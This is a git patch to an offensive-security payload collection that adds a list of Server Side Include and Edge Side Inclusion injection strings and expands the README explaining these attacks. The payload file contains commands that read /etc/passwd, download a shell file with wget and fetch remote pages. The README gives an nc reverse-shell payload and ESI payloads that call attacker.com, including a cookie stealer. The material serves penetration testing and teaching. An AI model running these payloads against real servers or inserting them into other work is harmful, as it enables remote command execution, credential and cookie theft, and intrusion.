From 0108d015716669f6727dd4ec5d628113a2892cd8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 16:51:28 +0100
Subject: [PATCH] Edge Side Inclusion

---
 .../Files/ssi_esi.txt                         | 92 +++++++++++++++++++
 Server Side Include Injection/README.md       | 55 +++++++++--
 2 files changed, 140 insertions(+), 7 deletions(-)
 create mode 100644 Server Side Include Injection/Files/ssi_esi.txt

diff --git a/Server Side Include Injection/Files/ssi_esi.txt b/Server Side Include Injection/Files/ssi_esi.txt
new file mode 100644
index 0000000..bed4827
--- /dev/null
+++ b/Server Side Include Injection/Files/ssi_esi.txt	
@@ -0,0 +1,92 @@
+<!--#config errmsg="File not found, informs users and password"-->
+<!--#config timefmt="A %B %d %Y %r"-->
+<!--#echo var="DATE_LOCAL" -->
+<!--#echo var="DOCUMENT_NAME" -->
+<!--#echo var="DOCUMENT_URI" -->
+<!--#echo var="auth_type" -->
+<!--#echo var="content_length" -->
+<!--#echo var="content_type" -->
+<!--#echo var="date_gmt" -->
+<!--#echo var="date_local" -->
+<!--#echo var="document_name" -->
+<!--#echo var="document_root" -->
+<!--#echo var="document_uri" -->
+<!--#echo var="forwarded" -->
+<!--#echo var="from" -->
+<!--#echo var="gateway_interface" -->
+<!--#echo var="http_accept" -->
+<!--#echo var="http_accept_charset" -->
+<!--#echo var="http_accept_encoding" -->
+<!--#echo var="http_accept_language" -->
+<!--#echo var="http_client_ip" -->
+<!--#echo var="http_connection" -->
+<!--#echo var="http_cookie" -->
+<!--#echo var="http_form" -->
+<!--#echo var="http_host" -->
+<!--#echo var="http_referer" -->
+<!--#echo var="http_ua_cpu" -->
+<!--#echo var="http_ua_os" -->
+<!--#echo var="http_user_agent" -->
+<!--#echo var="last_modified" -->
+<!--#echo var="netsite_root" -->
+<!--#echo var="page_count" -->
+<!--#echo var="path" -->
+<!--#echo var="path_info" -->
+<!--#echo var="path_info_translated" -->
+<!--#echo var="path_translated" -->
+<!--#echo var="query_string" -->
+<!--#echo var="query_string_unescaped" -->
+<!--#echo var="remote_addr" -->
+<!--#echo var="remote_host" -->
+<!--#echo var="remote_ident" -->
+<!--#echo var="remote_port" -->
+<!--#echo var="remote_user" -->
+<!--#echo var="request_method" -->
+<!--#echo var="request_uri" -->
+<!--#echo var="script_filename" -->
+<!--#echo var="script_name" -->
+<!--#echo var="script_uri" -->
+<!--#echo var="script_url" -->
+<!--#echo var="server_addr" -->
+<!--#echo var="server_admin" -->
+<!--#echo var="server_name -->
+<!--#echo var="server_port" -->
+<!--#echo var="server_protocol" -->
+<!--#echo var="server_software" -->
+<!--#echo var="site_htmlroot" -->
+<!--#echo var="total_hits" -->
+<!--#echo var="tz" -->
+<!--#echo var="unique_id" -->
+<!--#echo var="user_name" -->
+<!--#exec cmd="/bin/ls /" -->
+<!--#exec cmd="cat /etc/passwd" -->
+<!--#exec cmd="cd C:\WINDOWS\System32">
+<!--#exec cmd="curl http://sn1persecurity.com/.testing/rfi_vuln.php" -->
+<!--#exec cmd="dir" -->
+<!--#exec cmd="ipconfig" -->
+<!--#exec cmd="ls" -->
+<!--#exec cmd="perl -e 'print "X"*5000'" -->
+<!--#exec cmd="sleep 10" -->
+<!--#exec cmd="sleep 5" -->
+<!--#exec cmd="uname" -->
+<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
+<!--#exec cmd="whoami" -->
+<!--#exec cmd="whoami"-->
+<!--#flastmod virtual="echo.html" -->
+<!--#fsize file="ssi.shtml" -->
+<!--#include file=?UUUUUUUU...UU?-->
+<!--#include virtual="/" -->
+<!--#include virtual="/index.html" -->
+<!--#include virtual="http://sn1persecurity.com/.testing/rfi_vuln.php" -->
+<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
+<!--#printenv -->
+</nowiki>
+<esi:debug/>
+<esi:include src="http://google.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
+<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://google.com/poc.xsl" />
+<esi:include src=http://google.com/>
+<pre><!--#echo var="DATE_LOCAL" --> </pre>
+<pre><!--#exec cmd="dir" --></pre>
+<pre><!--#exec cmd="ls" --></pre>
+<pre><!--#exec cmd="whoami"--></pre>
+x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
\ No newline at end of file
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 00c6bff..6ec6cad 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -6,6 +6,7 @@
 ## Summary
 
 * [Methodology](#methodology)
+* [Edge Side Inclusion](#edge-side-inclusion)
 * [References](#references)
 
 
@@ -13,16 +14,56 @@
 
 SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands.
 
-| Description             | Payload |
-|-------------------------|---------|
-| Print a date            | `<!--#echo var="DATE_LOCAL" -->` |
-| Print all the variables | `<!--#printenv -->` |
-| Include a file          | `<!--#include file="/etc/passwd" -->` |
-| Execute commands        | `<!--#exec cmd="ls" -->` |
-| Doing a reverse shell   | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |
+SSI format: `<!--#directive param="value" -->`
+
+| Description             | Payload                                  |
+| ----------------------- | ---------------------------------------- |
+| Print the date          | `<!--#echo var="DATE_LOCAL" -->`         |
+| Print the document name | `<!--#echo var="DOCUMENT_NAME" -->`      |
+| Print all the variables | `<!--#printenv -->`                      |
+| Setting variables       | `<!--#set var="name" value="Rich" -->`   |
+| Include a file          | `<!--#include file="/etc/passwd" -->`    |
+| Include a file          | `<!--#include virtual="/index.html" -->` |
+| Execute commands        | `<!--#exec cmd="ls" -->`                 |
+| Reverse shell           | `<!--#exec cmd="mkfifo /tmp/f;nc IP PORT 0</tmp/f\|/bin/bash 1>/tmp/f;rm /tmp/f" -->` |
+
+
+## Edge Side Inclusion
+
+HTTP surrogates cannot differentiate between genuine ESI tags from the upstream server and malicious ones embedded in the HTTP response. This means that if an attacker manages to inject ESI tags into the HTTP response, the surrogate will process and evaluate them without question, assuming they are legitimate tags originating from the upstream server.
+
+Some surrogates will require ESI handling to be signaled in the Surrogate-Control HTTP header.
+
+```ps1
+Surrogate-Control: content="ESI/1.0"
+```
+
+| Description             | Payload                                  |
+| ----------------------- | ---------------------------------------- |
+| Blind detection         | `<esi:include src=http://attacker.com>`  |
+| XSS                     | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
+| Cookie stealer          | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
+| Include a file          | `<esi:include src="supersecret.txt">` |
+| Display debug info      | `<esi:debug/>` |
+| Add header              | `<!--esi $add_header('Location','http://attacker.com') -->` |
+| Inline fragment         | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
+
+
+| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
+| -------- | -------- | ---- | ------- | ------------------------- | -------------- |
+| Squid3   | Yes      | Yes  | Yes     | Yes                       | No             |
+| Varnish Cache	| Yes | No   | No      | Yes                       | Yes            |
+| Fastly   | Yes      | No   | No      | No                        | Yes            |
+| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No              | No             |
+| NodeJS' esi | Yes	  | Yes  | Yes     | No                        | No             |
+| NodeJS' nodesi | Yes | No  | No      | No                        | Optional       |
 
 
 ## References
 
+* [Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil - April 3, 2018](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
+* [DEF CON 26 - Edge Side Include Injection Abusing Caching Servers into SSRF - ldionmarcil - October 23, 2018](https://www.youtube.com/watch?v=VUZGZnpSg8I)
+* [ESI Injection Part 2: Abusing specific implementations - Philippe Arteau - May 2, 2019](https://gosecure.ai/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
 * [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://www.n00py.io/2017/08/exploiting-server-side-include-injection/)
+* [Server Side Inclusion/Edge Side Inclusion Injection - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injection)
 * [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
\ No newline at end of file